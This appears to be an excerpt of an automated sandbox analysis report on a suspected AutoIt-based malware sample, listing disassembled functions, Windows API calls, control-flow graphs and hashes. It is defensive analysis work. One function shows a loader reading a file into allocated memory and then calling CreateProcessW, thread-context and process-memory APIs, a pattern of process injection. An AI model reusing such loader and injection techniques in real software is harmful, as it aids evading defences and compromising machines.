                        • Instruction Fuzzy Hash: 24A11874E00209EBDF14EFA8C894BEEBBB5BF48308F208159E511BB281D7759A80CB55
                        Function 00332C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1388 332c63-332cd3 CreateWindowExW * 2 ShowWindow * 2
                        APIs
                        • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00332C91
                        • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00332CB2
                        • ShowWindow.USER32(00000000,?,?,?,?,?,?,00331CAD,?), ref: 00332CC6
                        • ShowWindow.USER32(00000000,?,?,?,?,?,?,00331CAD,?), ref: 00332CCF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Window$CreateShow
                        • String ID: AutoIt v3$edit
                        • API String ID: 1584632944-3779509399
                        • Opcode ID: d158b2af07d2df6de11881d0006795f118ce40641e90d1b6cb83bbe7a35dd3ea
                        • Instruction ID: 98bcb48bdc13650635e317bffa35d1517632f5e214ff3869e6e43d4b0c7a6342
                        • Opcode Fuzzy Hash: d158b2af07d2df6de11881d0006795f118ce40641e90d1b6cb83bbe7a35dd3ea
                        • Instruction Fuzzy Hash: 95F0B7755503907AEB211717AD08E772EBDD7C6F50F00106EFD04E25B0C6711851DAB8
                        Function 013823B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 142fileCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1503 13823b0-13824d1 call 1380000 call 13822a0 CreateFileW 1510 13824d8-13824e8 1503->1510 1511 13824d3 1503->1511 1514 13824ea 1510->1514 1515 13824ef-1382509 VirtualAlloc 1510->1515 1512 1382588-138258d 1511->1512 1514->1512 1516 138250b 1515->1516 1517 138250d-1382524 ReadFile 1515->1517 1516->1512 1518 1382528-1382562 call 13822e0 call 13812a0 1517->1518 1519 1382526 1517->1519 1524 138257e-1382586 ExitProcess 1518->1524 1525 1382564-1382579 call 1382330 1518->1525 1519->1512 1524->1512 1525->1524
                        APIs
                          • Part of subcall function 013822A0: Sleep.KERNELBASE(000001F4), ref: 013822B1
                        • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 013824C7
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189780107.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1380000_Copy of 01.jbxd
                        Similarity
                        • API ID: CreateFileSleep
                        • String ID: FQQ67CXOJLHGZHEQ9K
                        • API String ID: 2694422964-116326040
                        • Opcode ID: a4f209a63be537b3ca7b6589b41b930317dc46e838bd55533ee6e10554702ff1
                        • Instruction ID: 6a256b23d79d6812ddc657a5e146854bb6850714bf668557bb42f4814d70effd
                        • Opcode Fuzzy Hash: a4f209a63be537b3ca7b6589b41b930317dc46e838bd55533ee6e10554702ff1
                        • Instruction Fuzzy Hash: 1A516F70D04349DBEF11EBA8C818BEFBB79AF15304F004199E609BB2C1D6B94B49CB65
                        Function 003A2947 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1527 3a2947-3a29b9 call 371f50 call 3a25d6 call 34fe0b call 335722 call 3a274e call 33511f call 355232 1542 3a29bf-3a29c6 call 3a2e66 1527->1542 1543 3a2a6c-3a2a73 call 3a2e66 1527->1543 1548 3a29cc-3a2a6a call 35d583 call 354983 call 359038 call 35d583 call 359038 * 2 1542->1548 1549 3a2a75-3a2a77 1542->1549 1543->1549 1550 3a2a7c 1543->1550 1553 3a2a7f-3a2b3a call 3350f5 * 8 call 3a3017 call 35e5eb 1548->1553 1552 3a2cb6-3a2cb7 1549->1552 1550->1553 1554 3a2cd5-3a2cdb 1552->1554 1592 3a2b3c-3a2b3e 1553->1592 1593 3a2b43-3a2b5e call 3a2792 1553->1593 1557 3a2cdd-3a2ce8 call 34fdcd call 34fe14 1554->1557 1558 3a2cf0-3a2cf6 1554->1558 1570 3a2ced 1557->1570 1570->1558 1592->1552 1596 3a2bf0-3a2bfc call 35e678 1593->1596 1597 3a2b64-3a2b6c 1593->1597 1604 3a2bfe-3a2c0d DeleteFileW 1596->1604 1605 3a2c12-3a2c16 1596->1605 1598 3a2b6e-3a2b72 1597->1598 1599 3a2b74 1597->1599 1601 3a2b79-3a2b97 call 3350f5 1598->1601 1599->1601 1611 3a2b99-3a2b9e 1601->1611 1612 3a2bc1-3a2bd7 call 3a211d call 35dbb3 1601->1612 1604->1552 1607 3a2c18-3a2c7e call 3a25d6 call 35d2eb * 2 call 3a22ce 1605->1607 1608 3a2c91-3a2ca5 CopyFileW 1605->1608 1609 3a2cb9-3a2ccf DeleteFileW call 3a2fd8 1607->1609 1632 3a2c80-3a2c8f DeleteFileW 1607->1632 1608->1609 1610 3a2ca7-3a2cb4 DeleteFileW 1608->1610 1618 3a2cd4 1609->1618 1610->1552 1615 3a2ba1-3a2bb4 call 3a28d2 1611->1615 1627 3a2bdc-3a2be7 1612->1627 1625 3a2bb6-3a2bbf 1615->1625 1618->1554 1625->1612 1627->1597 1628 3a2bed 1627->1628 1628->1596 1632->1552
                        APIs
                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 003A2C05
                        • DeleteFileW.KERNEL32(?), ref: 003A2C87
                        • CopyFileW.KERNELBASE(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 003A2C9D
                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 003A2CAE
                        • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 003A2CC0
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: File$Delete$Copy
                        • String ID:
                        • API String ID: 3226157194-0
                        • Opcode ID: a29f8988d726fa184cb456a993f73114c0d0e3c49328d26b932cca064306b7cd
                        • Instruction ID: b1919587a9f808bc2fbe95d643fb35e7b4fba6b6a37b1427cd801eec91444d05
                        • Opcode Fuzzy Hash: a29f8988d726fa184cb456a993f73114c0d0e3c49328d26b932cca064306b7cd
                        • Instruction Fuzzy Hash: 09B15E72D00119ABDF26DBA8CC85EDFB7BDEF09350F1044A6F909EA151EB319A448F61
                        Function 00365AA9 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 186COMMONLIBRARYCODE
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1907 365aa9-365ace 1908 365ad7-365ad9 1907->1908 1909 365ad0-365ad2 1907->1909 1911 365afa-365b1f 1908->1911 1912 365adb-365af5 call 35f2c6 call 35f2d9 call 3627ec 1908->1912 1910 365ca5-365cb4 call 350a8c 1909->1910 1914 365b26-365b2c 1911->1914 1915 365b21-365b24 1911->1915 1912->1910 1919 365b2e-365b46 call 35f2c6 call 35f2d9 call 3627ec 1914->1919 1920 365b4b 1914->1920 1915->1914 1918 365b4e-365b53 1915->1918 1923 365b64-365b6d call 36564e 1918->1923 1924 365b55-365b61 call 369424 1918->1924 1953 365c9c-365c9f 1919->1953 1920->1918 1936 365b6f-365b71 1923->1936 1937 365ba8-365bba 1923->1937 1924->1923 1941 365b95-365b9e call 36542e 1936->1941 1942 365b73-365b78 1936->1942 1939 365c02-365c23 WriteFile 1937->1939 1940 365bbc-365bc2 1937->1940 1944 365c25-365c2b GetLastError 1939->1944 1945 365c2e 1939->1945 1947 365bc4-365bc7 1940->1947 1948 365bf2-365c00 call 3656c4 1940->1948 1954 365ba3-365ba6 1941->1954 1949 365b7e-365b8b call 3655e1 1942->1949 1950 365c6c-365c7e 1942->1950 1944->1945 1955 365c31-365c3c 1945->1955 1956 365be2-365bf0 call 365891 1947->1956 1957 365bc9-365bcc 1947->1957 1948->1954 1963 365b8e-365b90 1949->1963 1951 365c80-365c83 1950->1951 1952 365c89-365c99 call 35f2d9 call 35f2c6 1950->1952 1951->1952 1961 365c85-365c87 1951->1961 1952->1953 1967 365ca4 1953->1967 1954->1963 1964 365ca1 1955->1964 1965 365c3e-365c43 1955->1965 1956->1954 1957->1950 1966 365bd2-365be0 call 3657a3 1957->1966 1961->1967 1963->1955 1964->1967 1971 365c45-365c4a 1965->1971 1972 365c69 1965->1972 1966->1954 1967->1910 1976 365c60-365c67 call 35f2a3 1971->1976 1977 365c4c-365c5e call 35f2d9 call 35f2c6 1971->1977 1972->1950 1976->1953 1977->1953
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID:
                        • String ID: JO3
                        • API String ID: 0-1249764312
                        • Opcode ID: cc9c00e0e069c1c60bb2f46ce627244756a19732b255588aa89a3eda4b5a8649
                        • Instruction ID: f8b41dd9f43bdb2f1638203aa30f6a3a69c52a4e0b4efb2be4dea4c2ac513531
                        • Opcode Fuzzy Hash: cc9c00e0e069c1c60bb2f46ce627244756a19732b255588aa89a3eda4b5a8649
                        • Instruction Fuzzy Hash: EB51B075D0060AAFCF239FA8C945FAEBFB8EF05310F158069F805AB2A5D7719901DB61
                        Function 00333B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                        Download Yara Rule
                        APIs
                        • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00333B0F,SwapMouseButtons,00000004,?), ref: 00333B40
                        • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00333B0F,SwapMouseButtons,00000004,?), ref: 00333B61
                        • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00333B0F,SwapMouseButtons,00000004,?), ref: 00333B83
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: CloseOpenQueryValue
                        • String ID: Control Panel\Mouse
                        • API String ID: 3677997916-824357125
                        • Opcode ID: 8ed34c774835aafb1aff53b4d04c69dc4a7834f1019c271e98a17a7e72f670c5
                        • Instruction ID: 8fb63fa251f6ac1061b473c789ead33196ce2d03a474bbc1b6c138ac7689122d
                        • Opcode Fuzzy Hash: 8ed34c774835aafb1aff53b4d04c69dc4a7834f1019c271e98a17a7e72f670c5
                        • Instruction Fuzzy Hash: 4B112AB5520218FFDB228FA5DC84EAEB7BCEF04744F118459F805D7110D231EE409760
                        Function 013812A0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                        Download Yara Rule
                        APIs
                        • CreateProcessW.KERNELBASE(?,00000000), ref: 01381A5B
                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01381AF1
                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01381B13
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189780107.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1380000_Copy of 01.jbxd
                        Similarity
                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                        • String ID:
                        • API String ID: 2438371351-0
                        • Opcode ID: a5f8eca76df1c4d60a387bf050efe929c827b8bdc82418feca4108ede207e1c1
                        • Instruction ID: c21d6d2eede5ff32c406b01caa512aa9b4fbbf1e2eb980656dee0c5157442a49
                        • Opcode Fuzzy Hash: a5f8eca76df1c4d60a387bf050efe929c827b8bdc82418feca4108ede207e1c1
                        • Instruction Fuzzy Hash: 7B620A30A14258DBEB24DFA4C840BEEB776FF58304F1091A9D10DEB294E7799E81CB59
                        Function 00333923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94windowCOMMON
                        Download Yara Rule
                        APIs
                        • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 003733A2
                          • Part of subcall function 00336B57: _wcslen.LIBCMT ref: 00336B6A
                        • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00333A04
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: IconLoadNotifyShell_String_wcslen
                        • String ID: Line:
                        • API String ID: 2289894680-1585850449
                        • Opcode ID: 552c7c5b5ba16649ea27456f3ea35f0907927639808ea3de4ffa6e7a452ca88f
                        • Instruction ID: 52dd867cd5ab1c447a32eb929afdef3039bfb1d343310a5a193a336fe7bd94c3
                        • Opcode Fuzzy Hash: 552c7c5b5ba16649ea27456f3ea35f0907927639808ea3de4ffa6e7a452ca88f
                        • Instruction Fuzzy Hash: 8031B471508304AED327EB20DC86FEBB7DCAB40714F10852EF999970A1DB749649C7C6
                        Function 00332DE3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON
                        Download Yara Rule
                        APIs
                        • GetOpenFileNameW.COMDLG32(?), ref: 00372C8C
                          • Part of subcall function 00333AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00333A97,?,?,00332E7F,?,?,?,00000000), ref: 00333AC2
                          • Part of subcall function 00332DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00332DC4
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Name$Path$FileFullLongOpen
                        • String ID: X$`e?
                        • API String ID: 779396738-120205953
                        • Opcode ID: 902d0b7b29530fec6febb7bf2f560b70efad5d2e127bd0393e02aadc9917be7a
                        • Instruction ID: a08647a86cf70b5c7741f38ee9e50be0ad3252a03f670c2b425926968420999b
                        • Opcode Fuzzy Hash: 902d0b7b29530fec6febb7bf2f560b70efad5d2e127bd0393e02aadc9917be7a
                        • Instruction Fuzzy Hash: 0C21A871A0025C9FDB03EF95C846BEE7BFC9F49304F008059E509BB241DBB855498FA1
                        Function 0034FDDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                        Download Yara Rule
                        APIs
                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00350668
                          • Part of subcall function 003532A4: RaiseException.KERNEL32(?,?,?,0035068A,?,00401444,?,?,?,?,?,?,0035068A,00331129,003F8738,00331129), ref: 00353304
                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00350685
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Exception@8Throw$ExceptionRaise
                        • String ID: Unknown exception
                        • API String ID: 3476068407-410509341
                        • Opcode ID: bed16886f51b08e6c9d596a9029c6876d09517548b59d96dc91240dd202196e1
                        • Instruction ID: 74bf20c3046b6127cf791b60c6b2eefe1438901ffe9a36319f8571908a86aebb
                        • Opcode Fuzzy Hash: bed16886f51b08e6c9d596a9029c6876d09517548b59d96dc91240dd202196e1
                        • Instruction Fuzzy Hash: 00F0283490020D77CB0BB7A4D846C9D77AC9E00341B604830BD14C94B5EF72EA6DC6C0
                        Function 003A3017 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                        Download Yara Rule
                        APIs
                        • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 003A302F
                        • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 003A3044
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Temp$FileNamePath
                        • String ID: aut
                        • API String ID: 3285503233-3010740371
                        • Opcode ID: 2d5c6dc921da0cfd9422cd4d97d6b26b208fcae89dfffaa63e2694df721bee0a
                        • Instruction ID: f6bccd1d95f936c5f9f6f02d9b4f4feda6244ad1ef2dc20e8516f25227b581cd
                        • Opcode Fuzzy Hash: 2d5c6dc921da0cfd9422cd4d97d6b26b208fcae89dfffaa63e2694df721bee0a
                        • Instruction Fuzzy Hash: F8D05EB250032867DE20E7A4AC0EFDB3A6CDB04750F0006A1F659E2091DBB0A984CBD0
                        Function 003B7F59 Relevance: 4.9, APIs: 3, Instructions: 430COMMON
                        Download Yara Rule
                        APIs
                        • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 003B82F5
                        • TerminateProcess.KERNEL32(00000000), ref: 003B82FC
                        • FreeLibrary.KERNEL32(?,?,?,?), ref: 003B84DD
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Process$CurrentFreeLibraryTerminate
                        • String ID:
                        • API String ID: 146820519-0
                        • Opcode ID: b91215bf523227f73ab60d761ca49f1e2c6a4fe578e75f32d337a7bc4b229422
                        • Instruction ID: 3a896c4514587f31c0b4f08776c4583dddfbb521181d92dc92159fed1383f1fd
                        • Opcode Fuzzy Hash: b91215bf523227f73ab60d761ca49f1e2c6a4fe578e75f32d337a7bc4b229422
                        • Instruction Fuzzy Hash: 25127A71A083019FC725DF28C480B6ABBE9FF85318F05895DE9898B252CB31ED45CF92
                        Function 003310F3 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00331BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00331BF4
                          • Part of subcall function 00331BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00331BFC
                          • Part of subcall function 00331BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00331C07
                          • Part of subcall function 00331BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00331C12
                          • Part of subcall function 00331BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00331C1A
                          • Part of subcall function 00331BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00331C22
                          • Part of subcall function 00331B4A: RegisterWindowMessageW.USER32(00000004,?,003312C4), ref: 00331BA2
                        • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0033136A
                        • OleInitialize.OLE32 ref: 00331388
                        • CloseHandle.KERNEL32(00000000,00000000), ref: 003724AB
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                        • String ID:
                        • API String ID: 1986988660-0
                        • Opcode ID: f1255eedcc9612a39be3f73e4b40f64a9df818e6d8139099f2d7e9be1e685260
                        • Instruction ID: d5d620b313ddd8b131fc1bb3b8c1ab8039807e4c501568be2ab60fb1a230defb
                        • Opcode Fuzzy Hash: f1255eedcc9612a39be3f73e4b40f64a9df818e6d8139099f2d7e9be1e685260
                        • Instruction Fuzzy Hash: 9371BFB9911300AFC386EF79AE85A553AE4FB88354754863EE44AFB2B1EB344541CF4C
                        Function 003686AE Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • FindCloseChangeNotification.KERNELBASE(00000000,00000000,?,?,003685CC,?,003F8CC8,0000000C), ref: 00368704
                        • GetLastError.KERNEL32(?,003685CC,?,003F8CC8,0000000C), ref: 0036870E
                        • __dosmaperr.LIBCMT ref: 00368739
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: ChangeCloseErrorFindLastNotification__dosmaperr
                        • String ID:
                        • API String ID: 490808831-0
                        • Opcode ID: 61f2ce76636dd31cb1fcf53a544ce68eed9ee0d803907d3f1b08d6e1026cc603
                        • Instruction ID: a2b4e3e7df233c8b0465204e4b387440af621f5b20cbdd3e326e6f18be729549
                        • Opcode Fuzzy Hash: 61f2ce76636dd31cb1fcf53a544ce68eed9ee0d803907d3f1b08d6e1026cc603
                        • Instruction Fuzzy Hash: B4018E3670426016C2336334E845B7E27494B8BB74F3A8329FA48DF1DADEF0CC818250
                        Function 003A2FD8 Relevance: 4.5, APIs: 3, Instructions: 27filetimeCOMMON
                        Download Yara Rule
                        APIs
                        • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,003A2CD4,?,?,?,00000004,00000001), ref: 003A2FF2
                        • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,003A2CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 003A3006
                        • CloseHandle.KERNEL32(00000000,?,003A2CD4,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 003A300D
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: File$CloseCreateHandleTime
                        • String ID:
                        • API String ID: 3397143404-0
                        • Opcode ID: d5ad2f44b97b6dba5cd4c0725a099c264bd6158bce1d0b955faacb455dd10194
                        • Instruction ID: 2731eb235f02f3286c871147dbc2bb7cf1085d7f5f6e35376e24fceab50151df
                        • Opcode Fuzzy Hash: d5ad2f44b97b6dba5cd4c0725a099c264bd6158bce1d0b955faacb455dd10194
